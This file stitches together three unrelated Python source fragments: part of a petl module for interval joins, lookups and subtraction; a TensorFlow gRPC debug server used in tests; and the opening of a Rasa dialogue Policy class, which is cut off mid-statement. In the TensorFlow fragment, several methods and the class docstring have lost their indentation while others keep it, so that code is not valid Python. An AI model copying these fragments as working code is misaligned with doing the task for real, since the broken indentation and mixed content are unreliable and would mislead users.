    return {k: IntervalTreeLookup(t, include_stop=include_stop)
            for k, t in trees.items()}


Table.facetintervallookup = facetintervallookup
def facetintervallookupone(table, key, start='start', stop='stop',
                           value=None, include_stop=False, strict=True):
    """
    Construct a faceted interval lookup for the given table, returning at most
    one result for each query.

    If ``strict=True``, queries returning more than one result will raise a
    `DuplicateKeyError`. If ``strict=False`` and there is more than one
    result, the first result is returned.
    """
    trees = facettupletrees(table, key, start=start, stop=stop, value=value)
    return {k: IntervalTreeLookupOne(t, include_stop=include_stop,
                                     strict=strict)
            for k, t in trees.items()}


Table.facetintervallookupone = facetintervallookupone
def facetintervalrecordlookup(table, key, start='start', stop='stop',
                              include_stop=False):
    """
    As :func:`petl.transform.intervals.facetintervallookup` but return records.
    """
    trees = facetrecordtrees(table, key, start=start, stop=stop)
    return {k: IntervalTreeLookup(t, include_stop=include_stop)
            for k, t in trees.items()}


Table.facetintervalrecordlookup = facetintervalrecordlookup
def facetintervalrecordlookupone(table, key, start='start', stop='stop',
                                 include_stop=False, strict=True):
    """
    As :func:`petl.transform.intervals.facetintervallookupone` but return
    records.
    """
    # start/stop now default to 'start'/'stop' for consistency with every
    # other facet lookup constructor in this module; existing positional
    # callers are unaffected.
    trees = facetrecordtrees(table, key, start=start, stop=stop)
    out = dict()
    for k in trees:
        out[k] = IntervalTreeLookupOne(trees[k], include_stop=include_stop,
                                       strict=strict)
    return out


Table.facetintervalrecordlookupone = facetintervalrecordlookupone
def intervaljoin(left, right, lstart='start', lstop='stop', rstart='start',
                 rstop='stop', lkey=None, rkey=None, include_stop=False,
                 lprefix=None, rprefix=None):
    """
    Join two tables by overlapping intervals (inner join).

    Each row of `left` is paired with every row of `right` whose
    ``[rstart, rstop)`` interval overlaps the left row's
    ``[lstart, lstop)`` interval; left rows with no overlapping right row
    are dropped.  Start coordinates are included and stop coordinates are
    excluded from the interval; use the `include_stop` keyword argument to
    include the upper bound of the interval when finding overlaps.  When
    `lkey` and `rkey` are given, rows must additionally match on those key
    fields.  `lprefix`/`rprefix` optionally prefix the output field names.
    """
    assert (lkey is None) == (rkey is None), \
        'facet key field must be provided for both or neither table'
    return IntervalJoinView(left, right,
                            lstart=lstart, lstop=lstop,
                            rstart=rstart, rstop=rstop,
                            lkey=lkey, rkey=rkey,
                            include_stop=include_stop,
                            lprefix=lprefix, rprefix=rprefix)


Table.intervaljoin = intervaljoin
class IntervalJoinView(Table):
    """Lazy table view implementing :func:`intervaljoin`."""

    def __init__(self, left, right, lstart='start', lstop='stop',
                 rstart='start', rstop='stop', lkey=None, rkey=None,
                 include_stop=False, lprefix=None, rprefix=None):
        self.left = left
        self.right = right
        self.lstart = lstart
        self.lstop = lstop
        self.lkey = lkey
        self.rstart = rstart
        self.rstop = rstop
        self.rkey = rkey
        self.include_stop = include_stop
        self.lprefix = lprefix
        self.rprefix = rprefix

    def __iter__(self):
        # Inner join: unmatched left rows are dropped (leftouter=False).
        return iterintervaljoin(left=self.left, right=self.right,
                                lstart=self.lstart, lstop=self.lstop,
                                rstart=self.rstart, rstop=self.rstop,
                                lkey=self.lkey, rkey=self.rkey,
                                include_stop=self.include_stop,
                                missing=None, lprefix=self.lprefix,
                                rprefix=self.rprefix, leftouter=False)
def intervalleftjoin(left, right, lstart='start', lstop='stop', rstart='start',
                     rstop='stop', lkey=None, rkey=None, include_stop=False,
                     missing=None, lprefix=None, rprefix=None):
    """
    Like :func:`petl.transform.intervals.intervaljoin` but rows from the left
    table without a match in the right table are also included, with the
    right-hand output fields filled with `missing`.

    Note start coordinates are included and stop coordinates are excluded
    from the interval. Use the `include_stop` keyword argument to include the
    upper bound of the interval when finding overlaps.
    """
    assert (lkey is None) == (rkey is None), \
        'facet key field must be provided for both or neither table'
    return IntervalLeftJoinView(left, right,
                                lstart=lstart, lstop=lstop,
                                rstart=rstart, rstop=rstop,
                                lkey=lkey, rkey=rkey,
                                include_stop=include_stop,
                                missing=missing,
                                lprefix=lprefix, rprefix=rprefix)


Table.intervalleftjoin = intervalleftjoin
class IntervalLeftJoinView(Table):
    """Lazy table view implementing :func:`intervalleftjoin`."""

    def __init__(self, left, right, lstart='start', lstop='stop',
                 rstart='start', rstop='stop', lkey=None, rkey=None,
                 missing=None, include_stop=False, lprefix=None, rprefix=None):
        self.left = left
        self.right = right
        self.lstart = lstart
        self.lstop = lstop
        self.lkey = lkey
        self.rstart = rstart
        self.rstop = rstop
        self.rkey = rkey
        self.missing = missing
        self.include_stop = include_stop
        self.lprefix = lprefix
        self.rprefix = rprefix

    def __iter__(self):
        # Left outer join: unmatched left rows are padded with `missing`.
        return iterintervaljoin(left=self.left, right=self.right,
                                lstart=self.lstart, lstop=self.lstop,
                                rstart=self.rstart, rstop=self.rstop,
                                lkey=self.lkey, rkey=self.rkey,
                                include_stop=self.include_stop,
                                missing=self.missing, lprefix=self.lprefix,
                                rprefix=self.rprefix, leftouter=True)
def intervalantijoin(left, right, lstart='start', lstop='stop', rstart='start',
                     rstop='stop', lkey=None, rkey=None, include_stop=False,
                     missing=None):
    """
    Return rows from the `left` table with no overlapping rows from the `right`
    table.

    Note start coordinates are included and stop coordinates are excluded
    from the interval. Use the `include_stop` keyword argument to include the
    upper bound of the interval when finding overlaps.
    """
    assert (lkey is None) == (rkey is None), \
        'facet key field must be provided for both or neither table'
    return IntervalAntiJoinView(left, right,
                                lstart=lstart, lstop=lstop,
                                rstart=rstart, rstop=rstop,
                                lkey=lkey, rkey=rkey,
                                include_stop=include_stop, missing=missing)


Table.intervalantijoin = intervalantijoin
class IntervalAntiJoinView(Table):
    """Lazy table view implementing :func:`intervalantijoin`."""

    def __init__(self, left, right, lstart='start', lstop='stop',
                 rstart='start', rstop='stop', lkey=None, rkey=None,
                 missing=None, include_stop=False):
        self.left = left
        self.right = right
        self.lstart = lstart
        self.lstop = lstop
        self.lkey = lkey
        self.rstart = rstart
        self.rstop = rstop
        self.rkey = rkey
        self.missing = missing
        self.include_stop = include_stop

    def __iter__(self):
        # The anti join is expressed as a left outer join that emits only
        # the unmatched left rows (anti=True).
        return iterintervaljoin(left=self.left, right=self.right,
                                lstart=self.lstart, lstop=self.lstop,
                                rstart=self.rstart, rstop=self.rstop,
                                lkey=self.lkey, rkey=self.rkey,
                                include_stop=self.include_stop,
                                missing=self.missing, lprefix=None,
                                rprefix=None, leftouter=True, anti=True)
def iterintervaljoin(left, right, lstart, lstop, rstart, rstop, lkey,
                     rkey, include_stop, missing, lprefix, rprefix, leftouter,
                     anti=False):
    """Generator implementing the interval join variants.

    Yields the output header first, then joined rows.  `leftouter` controls
    whether unmatched left rows are emitted (padded with `missing`);
    `anti` inverts the join so that ONLY unmatched left rows are emitted,
    without any right-hand fields.
    """
    # create iterators and obtain fields
    lit = iter(left)
    lhdr = next(lit)
    lflds = list(map(text_type, lhdr))
    rit = iter(right)
    rhdr = next(rit)
    rflds = list(map(text_type, rhdr))
    # check fields via petl.util.asindices (raises FieldSelectionError if spec
    # is not valid)
    asindices(lhdr, lstart)
    asindices(lhdr, lstop)
    if lkey is not None:
        asindices(lhdr, lkey)
    asindices(rhdr, rstart)
    asindices(rhdr, rstop)
    if rkey is not None:
        asindices(rhdr, rkey)
    # determine output fields
    if lprefix is None:
        outhdr = list(lflds)
        if not anti:
            outhdr.extend(rflds)
    else:
        # NOTE(review): if lprefix is given but rprefix is None, the extend
        # below raises TypeError (None + str) — confirm callers always pass
        # both prefixes together.
        outhdr = list(lprefix + f for f in lflds)
        if not anti:
            outhdr.extend(rprefix + f for f in rflds)
    yield tuple(outhdr)
    # create getters for start and stop positions
    getlstart = itemgetter(lflds.index(lstart))
    getlstop = itemgetter(lflds.index(lstop))
    if rkey is None:
        # build interval lookup for right table
        lookup = intervallookup(right, rstart, rstop, include_stop=include_stop)
        search = lookup.search
        # main loop
        for lrow in lit:
            start = getlstart(lrow)
            stop = getlstop(lrow)
            rrows = search(start, stop)
            if rrows:
                if not anti:
                    for rrow in rrows:
                        outrow = list(lrow)
                        outrow.extend(rrow)
                        yield tuple(outrow)
            elif leftouter:
                outrow = list(lrow)
                if not anti:
                    outrow.extend([missing] * len(rflds))
                yield tuple(outrow)
    else:
        # build interval lookup for right table
        lookup = facetintervallookup(right, key=rkey, start=rstart,
                                     stop=rstop, include_stop=include_stop)
        search = dict()
        for f in lookup:
            search[f] = lookup[f].search
        # getter for facet key values in left table
        getlkey = itemgetter(*asindices(lflds, lkey))
        # main loop
        for lrow in lit:
            # NOTE(review): rebinds the lkey parameter each iteration;
            # harmless here since the original value is no longer needed.
            lkey = getlkey(lrow)
            start = getlstart(lrow)
            stop = getlstop(lrow)
            try:
                # KeyError: no facet in the right table for this key.
                rrows = search[lkey](start, stop)
            except KeyError:
                rrows = None
            except AttributeError:
                # presumably defensive against a malformed lookup entry —
                # TODO confirm this branch is reachable
                rrows = None
            if rrows:
                if not anti:
                    for rrow in rrows:
                        outrow = list(lrow)
                        outrow.extend(rrow)
                        yield tuple(outrow)
            elif leftouter:
                outrow = list(lrow)
                if not anti:
                    outrow.extend([missing] * len(rflds))
                yield tuple(outrow)
def intervaljoinvalues(left, right, value, lstart='start', lstop='stop',
                       rstart='start', rstop='stop', lkey=None, rkey=None,
                       include_stop=False):
    """
    Convenience function to join the left table with values from a specific
    field in the right hand table.

    Note start coordinates are included and stop coordinates are excluded
    from the interval. Use the `include_stop` keyword argument to include the
    upper bound of the interval when finding overlaps.
    """
    assert (lkey is None) == (rkey is None), \
        'facet key field must be provided for both or neither table'
    if lkey is None:
        lkp = intervallookup(right, start=rstart, stop=rstop, value=value,
                             include_stop=include_stop)

        def matches(row):
            return lkp.search(row[lstart], row[lstop])
    else:
        lkp = facetintervallookup(right, rkey, start=rstart, stop=rstop,
                                  value=value, include_stop=include_stop)

        def matches(row):
            return lkp[row[lkey]].search(row[lstart], row[lstop])
    return addfield(left, value, matches)


Table.intervaljoinvalues = intervaljoinvalues
def intervalsubtract(left, right, lstart='start', lstop='stop', rstart='start',
                     rstop='stop', lkey=None, rkey=None, include_stop=False):
    """
    Subtract intervals in the right hand table from intervals in the left hand
    table.
    """
    assert (lkey is None) == (rkey is None), \
        'facet key field must be provided for both or neither table'
    return IntervalSubtractView(left, right,
                                lstart=lstart, lstop=lstop,
                                rstart=rstart, rstop=rstop,
                                lkey=lkey, rkey=rkey,
                                include_stop=include_stop)


Table.intervalsubtract = intervalsubtract
class IntervalSubtractView(Table):
    """Lazy table view implementing :func:`intervalsubtract`."""

    def __init__(self, left, right, lstart='start', lstop='stop',
                 rstart='start', rstop='stop', lkey=None, rkey=None,
                 include_stop=False):
        self.left = left
        self.right = right
        self.lstart = lstart
        self.lstop = lstop
        self.lkey = lkey
        self.rstart = rstart
        self.rstop = rstop
        self.rkey = rkey
        self.include_stop = include_stop

    def __iter__(self):
        return iterintervalsubtract(self.left, self.right, self.lstart,
                                    self.lstop, self.rstart, self.rstop,
                                    self.lkey, self.rkey, self.include_stop)
def iterintervalsubtract(left, right, lstart, lstop, rstart, rstop, lkey, rkey,
                         include_stop):
    """Generator implementing :func:`intervalsubtract`.

    Yields the left header unchanged, then for each left row either the row
    itself (when nothing in the right table overlaps it) or one row per
    uncovered sub-interval, with the start/stop fields rewritten.
    """
    # create iterators and obtain fields
    lit = iter(left)
    lhdr = next(lit)
    lflds = list(map(text_type, lhdr))
    rit = iter(right)
    rhdr = next(rit)
    # check fields via petl.util.asindices (raises FieldSelectionError if spec
    # is not valid)
    asindices(lhdr, lstart)
    asindices(lhdr, lstop)
    if lkey is not None:
        asindices(lhdr, lkey)
    asindices(rhdr, rstart)
    asindices(rhdr, rstop)
    if rkey is not None:
        asindices(rhdr, rkey)
    # determine output fields
    outhdr = list(lflds)
    yield tuple(outhdr)
    # create getters for start and stop positions
    lstartidx, lstopidx = asindices(lhdr, (lstart, lstop))
    getlcoords = itemgetter(lstartidx, lstopidx)
    getrcoords = itemgetter(*asindices(rhdr, (rstart, rstop)))
    if rkey is None:
        # build interval lookup for right table
        lookup = intervallookup(right, rstart, rstop, include_stop=include_stop)
        search = lookup.search
        # main loop
        for lrow in lit:
            start, stop = getlcoords(lrow)
            rrows = search(start, stop)
            if not rrows:
                yield tuple(lrow)
            else:
                rivs = sorted([getrcoords(rrow) for rrow in rrows],
                              key=itemgetter(0))  # sort by start
                for x, y in _subtract(start, stop, rivs):
                    out = list(lrow)
                    out[lstartidx] = x
                    out[lstopidx] = y
                    yield tuple(out)
    else:
        # build interval lookup for right table
        lookup = facetintervallookup(right, key=rkey, start=rstart, stop=rstop,
                                     include_stop=include_stop)
        # getter for facet key values in left table
        getlkey = itemgetter(*asindices(lhdr, lkey))
        # main loop
        for lrow in lit:
            # NOTE(review): rebinds the lkey parameter each iteration;
            # harmless here since the original value is no longer needed.
            lkey = getlkey(lrow)
            start, stop = getlcoords(lrow)
            try:
                # KeyError: no facet in the right table for this key.
                rrows = lookup[lkey].search(start, stop)
            except KeyError:
                rrows = None
            except AttributeError:
                # presumably defensive against a malformed lookup entry —
                # TODO confirm this branch is reachable
                rrows = None
            if not rrows:
                yield tuple(lrow)
            else:
                rivs = sorted([getrcoords(rrow) for rrow in rrows],
                              key=itemgetter(0))  # sort by start
                for x, y in _subtract(start, stop, rivs):
                    out = list(lrow)
                    out[lstartidx] = x
                    out[lstopidx] = y
                    yield tuple(out)
from collections import namedtuple
# NOTE(review): mid-file import; collections is stdlib, so moving this to the
# top-of-file import block would be tidier.
# Lightweight immutable (start, stop) pair used by _collapse/_subtract below.
_Interval = namedtuple('Interval', 'start stop')
def collapsedintervals(table, start='start', stop='stop', key=None):
    """
    Utility function to collapse intervals in a table.

    If no facet `key` is given, returns an iterator over `(start, stop)`
    tuples. If facet `key` is given, returns an iterator over
    `(key, start, stop)` tuples.
    """
    if key is None:
        ordered = sort(table, key=start)
        for span in _collapse(values(ordered, (start, stop))):
            yield span
    else:
        ordered = sort(table, key=(key, start))
        for k, group in rowgroupby(ordered, key=key, value=(start, stop)):
            for span in _collapse(group):
                yield (k,) + span


Table.collapsedintervals = collapsedintervals
def _collapse(intervals):
    """
    Merge an iterable of (start, stop) intervals, already sorted by start
    coord, yielding maximal non-overlapping _Interval spans.  Intervals that
    merely touch (start == previous stop) are merged as well.
    """
    current = None
    for begin, end in intervals:
        if current is None:
            current = _Interval(begin, end)
        elif begin <= current.stop < end:
            # Overlaps (or touches) the open span and extends beyond it.
            current = _Interval(current.start, end)
        elif begin > current.stop:
            # Gap: emit the finished span and start a new one.
            yield current
            current = _Interval(begin, end)
        # else: wholly contained in the current span; nothing to do.
    if current is not None:
        yield current
def _subtract(start, stop, intervals):
    """
    Yield the portions of the spanning interval [start, stop) NOT covered by
    `intervals` (an iterable of (start, stop) pairs sorted by start coord).
    """
    cursor = start
    last_end = None
    for sub_begin, sub_end in _collapse(intervals):
        if cursor < sub_begin:
            # Uncovered gap before this subtracted span.
            yield _Interval(cursor, sub_begin)
        cursor = sub_end
        last_end = sub_end
    if last_end is not None and last_end < stop:
        # Uncovered tail after the final subtracted span.
        yield _Interval(last_end, stop)
| |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""GRPC debug server for testing."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import errno
import functools
import hashlib
import json
import os
import re
import shutil
import tempfile
import threading
import time
import portpicker
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.util import event_pb2
from tensorflow.python.client import session
from tensorflow.python.debug.lib import debug_data
from tensorflow.python.debug.lib import debug_utils
from tensorflow.python.debug.lib import grpc_debug_server
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import errors
from tensorflow.python.ops import variables
def _get_dump_file_path(dump_root, device_name, debug_node_name):
  """Get the file path of the dump file for a debug node.

  Args:
    dump_root: (str) Root dump directory.
    device_name: (str) Name of the device that the debug node resides on.
    debug_node_name: (str) Name of the debug node, e.g.,
      cross_entropy/Log:0:DebugIdentity.

  Returns:
    (str) Full path of the dump file.
  """
  device_root = os.path.join(
      dump_root, debug_data.device_name_to_device_path(device_name))
  # Mirror the node's name scope as a directory structure; ':' is replaced
  # with '_' since it is not a legal filename character everywhere.
  node_dir, node_base = os.path.split(debug_node_name)
  dump_dir = os.path.join(device_root, node_dir) if node_dir else device_root
  dump_file_name = node_base.replace(":", "_")
  # Suffix with a microsecond timestamp to keep successive dumps distinct.
  now_microsec = int(round(time.time() * 1000 * 1000))
  dump_file_name += "_%d" % now_microsec
  return os.path.join(dump_dir, dump_file_name)
class EventListenerTestStreamHandler(
grpc_debug_server.EventListenerBaseStreamHandler):
"""Implementation of EventListenerBaseStreamHandler that dumps to file."""
  def __init__(self, dump_dir, event_listener_servicer):
    """Constructor.

    Args:
      dump_dir: (str or None) Directory to dump received events to; if
        falsy, events are instead accumulated in memory on the servicer.
      event_listener_servicer: The servicer that owns this stream handler.
    """
    self._dump_dir = dump_dir
    self._event_listener_servicer = event_listener_servicer
    if self._dump_dir:
      self._try_makedirs(self._dump_dir)
    # The grpc_path is learned from the first core-metadata event; until
    # then incoming graph defs are cached in the parallel lists below.
    self._grpc_path = None
    self._cached_graph_defs = []
    self._cached_graph_def_device_names = []
    self._cached_graph_def_wall_times = []
def on_core_metadata_event(self, event):
core_metadata = json.loads(event.log_message.message)
if not self._grpc_path:
grpc_path = core_metadata["grpc_path"]
if grpc_path:
if grpc_path.startswith("/"):
grpc_path = grpc_path[1:]
if self._dump_dir:
self._dump_dir = os.path.join(self._dump_dir, grpc_path)
# Write cached graph defs to filesystem.
for graph_def, device_name, wall_time in zip(
self._cached_graph_defs,
self._cached_graph_def_device_names,
self._cached_graph_def_wall_times):
self._write_graph_def(graph_def, device_name, wall_time)
if self._dump_dir:
self._write_core_metadata_event(event)
else:
self._event_listener_servicer.core_metadata_json_strings.append(
event.log_message.message)
  def on_graph_def(self, graph_def, device_name, wall_time):
    """Implementation of the GraphDef-carrying Event proto callback.

    When dumping to disk, the graph is written immediately if the grpc_path
    is already known (self._grpc_path is set); otherwise it is cached until
    a core metadata event supplies the path.  In in-memory mode the graph
    is appended to the servicer's partition_graph_defs.

    Args:
      graph_def: A GraphDef object.
      device_name: Name of the device on which the graph was created.
      wall_time: An epoch timestamp (in microseconds) for the graph.
    """
    if self._dump_dir:
      if self._grpc_path:
        self._write_graph_def(graph_def, device_name, wall_time)
      else:
        self._cached_graph_defs.append(graph_def)
        self._cached_graph_def_device_names.append(device_name)
        self._cached_graph_def_wall_times.append(wall_time)
    else:
      self._event_listener_servicer.partition_graph_defs.append(graph_def)
def on_value_event(self, event):
"""Implementation of the tensor value-carrying Event proto callback.
Writes the Event proto to the file system for testing. The path written to
follows the same pattern as the file:// debug URLs of tfdbg, i.e., the
name scope of the op becomes the directory structure under the dump root
directory.
Args:
event: The Event proto carrying a tensor value.
"""
if self._dump_dir:
self._write_value_event(event)
else:
value = event.summary.value[0]
self._event_listener_servicer.debug_tensor_values[value.node_name].append(
debug_data.load_tensor_from_event(event))
def _try_makedirs(self, dir_path):
if not os.path.isdir(dir_path):
try:
os.makedirs(dir_path)
except OSError as error:
if error.errno != errno.EEXIST:
raise
def _write_core_metadata_event(self, event):
core_metadata_path = os.path.join(
self._dump_dir,
debug_data.METADATA_FILE_PREFIX + debug_data.CORE_METADATA_TAG +
"_%d" % event.wall_time)
self._try_makedirs(self._dump_dir)
with open(core_metadata_path, "wb") as f:
f.write(event.SerializeToString())
def _write_graph_def(self, graph_def, device_name, wall_time):
encoded_graph_def = graph_def.SerializeToString()
graph_hash = int(hashlib.md5(encoded_graph_def).hexdigest(), 16)
event = event_pb2.Event(graph_def=encoded_graph_def, wall_time=wall_time)
graph_file_path = os.path.join(
self._dump_dir,
debug_data.device_name_to_device_path(device_name),
debug_data.METADATA_FILE_PREFIX + debug_data.GRAPH_FILE_TAG +
debug_data.HASH_TAG + "%d_%d" % (graph_hash, wall_time))
self._try_makedirs(os.path.dirname(graph_file_path))
with open(graph_file_path, "wb") as f:
f.write(event.SerializeToString())
def _write_value_event(self, event):
value = event.summary.value[0]
# Obtain the device name from the metadata.
summary_metadata = event.summary.value[0].metadata
if not summary_metadata.plugin_data:
raise ValueError("The value lacks plugin data.")
try:
content = json.loads(summary_metadata.plugin_data[0].content)
except ValueError as err:
raise ValueError("Could not parse content into JSON: %r, %r" % (content,
err))
device_name = content["device"]
dump_full_path = _get_dump_file_path(
self._dump_dir, device_name, value.node_name)
self._try_makedirs(os.path.dirname(dump_full_path))
with open(dump_full_path, "wb") as f:
f.write(event.SerializeToString())
class EventListenerTestServicer(grpc_debug_server.EventListenerBaseServicer):
    """An implementation of EventListenerBaseServicer for testing."""

    def __init__(self, server_port, dump_dir):
        """Constructor of EventListenerTestServicer.

        Args:
            server_port: (int) The server port number.
            dump_dir: (str) The root directory to which the data files will be
                dumped. If empty or None, the received debug data will not be
                dumped to the file system: they will be stored in memory
                instead.
        """
        # Initializing the in-memory stores is identical to clearing them.
        self.clear_data()

        super().__init__(
            server_port,
            functools.partial(EventListenerTestStreamHandler, dump_dir, self))

    def clear_data(self):
        """Resets all in-memory stores of received debug data."""
        self.core_metadata_json_strings = []
        self.partition_graph_defs = []
        self.debug_tensor_values = collections.defaultdict(list)
def start_server_on_separate_thread(dump_to_filesystem=True,
                                    server_start_delay_sec=0.0,
                                    poll_server=False):
    """Creates a test gRPC debug server and runs it on its own thread.

    Args:
        dump_to_filesystem: (bool) If True, the server dumps received debug
            data into a fresh temporary directory; otherwise it keeps the data
            in memory.
        server_start_delay_sec: (float) Seconds to wait before the server
            starts serving.
        poll_server: (bool) If True, poll the server until it responds
            successfully before returning.

    Returns:
        server_port: (int) Port on which the server runs.
        debug_server_url: (str) grpc:// URL to the server.
        server_dump_dir: (str) The debug server's dump directory.
        server_thread: The server Thread object.
        server: The `EventListenerTestServicer` object.

    Raises:
        ValueError: If the server does not respond successfully within the
            maximum number of polling attempts.
    """
    server_port = portpicker.pick_unused_port()
    debug_server_url = "grpc://localhost:%d" % server_port

    server_dump_dir = tempfile.mkdtemp() if dump_to_filesystem else None
    server = EventListenerTestServicer(server_port=server_port,
                                       dump_dir=server_dump_dir)

    def _delayed_server_runner():
        # Deliberately hold off the startup so callers can exercise
        # connect-before-ready code paths.
        time.sleep(server_start_delay_sec)
        server.run_server()

    server_thread = threading.Thread(target=_delayed_server_runner)
    server_thread.start()

    if poll_server:
        poll_succeeded = _poll_server_till_success(
            50,
            0.2,
            debug_server_url,
            server_dump_dir,
            server,
            gpu_memory_fraction=0.1)
        if not poll_succeeded:
            raise ValueError(
                "Failed to start test gRPC debug server at port %d" % server_port)
        # Discard the debug data generated by the polling itself.
        server.clear_data()

    return server_port, debug_server_url, server_dump_dir, server_thread, server
def _poll_server_till_success(max_attempts,
                              sleep_per_poll_sec,
                              debug_server_url,
                              dump_dir,
                              server,
                              gpu_memory_fraction=1.0):
    """Poll server until success or exceeding max polling count.

    Args:
        max_attempts: (int) How many times to poll at maximum
        sleep_per_poll_sec: (float) How many seconds to sleep for after each
            unsuccessful poll.
        debug_server_url: (str) gRPC URL to the debug server.
        dump_dir: (str) Dump directory to look for files in. If None, will directly
            check data from the server object.
        server: The server object.
        gpu_memory_fraction: (float) Fraction of GPU memory to be
            allocated for the Session used in server polling.

    Returns:
        (bool) Whether the polling succeeded within max_polls attempts.
    """
    poll_count = 0
    # Cap GPU memory so the polling session does not starve other sessions in
    # the test process.
    config = config_pb2.ConfigProto(gpu_options=config_pb2.GPUOptions(
        per_process_gpu_memory_fraction=gpu_memory_fraction))
    with session.Session(config=config) as sess:
        for poll_count in range(max_attempts):
            server.clear_data()
            print("Polling: poll_count = %d" % poll_count)

            # A uniquely named op per attempt, so every poll sends a fresh
            # debug-watched tensor to the server.
            x_init_name = "x_init_%d" % poll_count
            x_init = constant_op.constant([42.0], shape=[1], name=x_init_name)
            x = variables.Variable(x_init, name=x_init_name)

            run_options = config_pb2.RunOptions()
            debug_utils.add_debug_tensor_watch(
                run_options, x_init_name, 0, debug_urls=[debug_server_url])
            try:
                sess.run(x.initializer, options=run_options)
            except errors.FailedPreconditionError:
                # The server may not be up yet; treat the failed run as an
                # unsuccessful poll and retry below.
                pass

            if dump_dir:
                # File-system mode: success once the dump dir exists and holds
                # at least one debug event; clean it up before returning.
                if os.path.isdir(
                        dump_dir) and debug_data.DebugDumpDir(dump_dir).size > 0:
                    shutil.rmtree(dump_dir)
                    print("Poll succeeded.")
                    return True
                else:
                    print("Poll failed. Sleeping for %f s" % sleep_per_poll_sec)
                    time.sleep(sleep_per_poll_sec)
            else:
                # In-memory mode: success once the servicer has cached any
                # tensor values.
                if server.debug_tensor_values:
                    print("Poll succeeded.")
                    return True
                else:
                    print("Poll failed. Sleeping for %f s" % sleep_per_poll_sec)
                    time.sleep(sleep_per_poll_sec)

    return False
| |
from __future__ import annotations
import abc
import copy
import logging
from enum import Enum
from pathlib import Path
from rasa.shared.core.events import Event
from typing import (
Any,
List,
Optional,
Text,
Dict,
Callable,
Union,
Tuple,
TYPE_CHECKING,
)
import numpy as np
from rasa.engine.graph import GraphComponent, ExecutionContext
from rasa.engine.storage.resource import Resource
from rasa.engine.storage.storage import ModelStorage
from rasa.core.featurizers.precomputation import MessageContainerForCoreFeaturization
from rasa.core.featurizers.tracker_featurizers import TrackerFeaturizer
from rasa.core.featurizers.tracker_featurizers import MaxHistoryTrackerFeaturizer
from rasa.core.featurizers.single_state_featurizer import SingleStateFeaturizer
from rasa.core.featurizers.tracker_featurizers import FEATURIZER_FILE
import rasa.utils.common
import rasa.shared.utils.io
from rasa.shared.exceptions import RasaException, FileIOException
from rasa.shared.nlu.constants import ENTITIES, INTENT, TEXT, ACTION_TEXT, ACTION_NAME
from rasa.shared.core.domain import Domain, State
from rasa.shared.core.trackers import DialogueStateTracker
from rasa.shared.core.generator import TrackerWithCachedStates
from rasa.core.constants import (
DEFAULT_POLICY_PRIORITY,
POLICY_PRIORITY,
POLICY_MAX_HISTORY,
)
from rasa.shared.core.constants import (
USER,
SLOTS,
PREVIOUS_ACTION,
ACTIVE_LOOP,
)
import rasa.shared.utils.common
if TYPE_CHECKING:
from rasa.shared.nlu.training_data.features import Features
logger = logging.getLogger(__name__)
class SupportedData(Enum):
    """Enumeration of a policy's supported training data type."""

    # policy only supports ML-based training data ("stories")
    ML_DATA = 1

    # policy only supports rule-based data ("rules")
    RULE_DATA = 2

    # policy supports both ML-based and rule-based data ("stories" as well as "rules")
    ML_AND_RULE_DATA = 3

    @staticmethod
    def trackers_for_supported_data(
        supported_data: SupportedData,
        trackers: Union[List[DialogueStateTracker], List[TrackerWithCachedStates]],
    ) -> Union[List[DialogueStateTracker], List[TrackerWithCachedStates]]:
        """Returns the subset of trackers usable with the given data type.

        Args:
            supported_data: Supported data filter for the `trackers`.
            trackers: Trackers to split.

        Returns:
            Trackers from ML-based training data and/or rule-based data.
        """
        if supported_data == SupportedData.RULE_DATA:
            keep_rule_trackers = True
        elif supported_data == SupportedData.ML_DATA:
            keep_rule_trackers = False
        else:
            # `SupportedData.ML_AND_RULE_DATA`: no filtering needed.
            return trackers

        return [
            tracker
            for tracker in trackers
            if bool(tracker.is_rule_tracker) == keep_rule_trackers
        ]
class Policy(GraphComponent):
    """Common parent class for all dialogue policies."""

    @staticmethod
    def supported_data() -> SupportedData:
        """The type of data supported by this policy.

        By default, this is only ML-based training data. If policies support rule data,
        or both ML-based data and rule data, they need to override this method.

        Returns:
            The data type supported by this policy (ML-based training data).
        """
        return SupportedData.ML_DATA

    def __init__(
        self,
        config: Dict[Text, Any],
        model_storage: ModelStorage,
        resource: Resource,
        execution_context: ExecutionContext,
        featurizer: Optional[TrackerFeaturizer] = None,
    ) -> None:
        """Constructs a new Policy object."""
        self.config = config
        # Derive a featurizer from the config unless one was supplied
        # explicitly (e.g. a featurizer restored from disk in `load`).
        if featurizer is None:
            featurizer = self._create_featurizer()

        self.__featurizer = featurizer

        self.priority = config.get(POLICY_PRIORITY, DEFAULT_POLICY_PRIORITY)
        self.finetune_mode = execution_context.is_finetuning

        self._model_storage = model_storage
        self._resource = resource

    @classmethod
    def create(
        cls,
        config: Dict[Text, Any],
        model_storage: ModelStorage,
        resource: Resource,
        execution_context: ExecutionContext,
        **kwargs: Any,
    ) -> Policy:
        """Creates a new untrained policy (see parent class for full docstring)."""
        return cls(config, model_storage, resource, execution_context)

    def _create_featurizer(self) -> TrackerFeaturizer:
        """Builds the tracker (and optional state) featurizer from `self.config`."""
        # Deep-copy because `_get_featurizer_from_config` pops keys from the
        # nested featurizer config dicts.
        policy_config = copy.deepcopy(self.config)

        featurizer_configs = policy_config.get("featurizer")

        if not featurizer_configs:
            return self._standard_featurizer()

        featurizer_func = _get_featurizer_from_config(
            featurizer_configs,
            self.__class__.__name__,
            lookup_path="rasa.core.featurizers.tracker_featurizers",
        )
        featurizer_config = featurizer_configs[0]

        state_featurizer_configs = featurizer_config.pop("state_featurizer", None)
        if state_featurizer_configs:
            state_featurizer_func = _get_featurizer_from_config(
                state_featurizer_configs,
                self.__class__.__name__,
                lookup_path="rasa.core.featurizers.single_state_featurizer",
            )
            state_featurizer_config = state_featurizer_configs[0]

            featurizer_config["state_featurizer"] = state_featurizer_func(
                **state_featurizer_config
            )

        featurizer = featurizer_func(**featurizer_config)
        # A `max_history` set on the policy itself takes effect unless the
        # featurizer config overrides it explicitly.
        if (
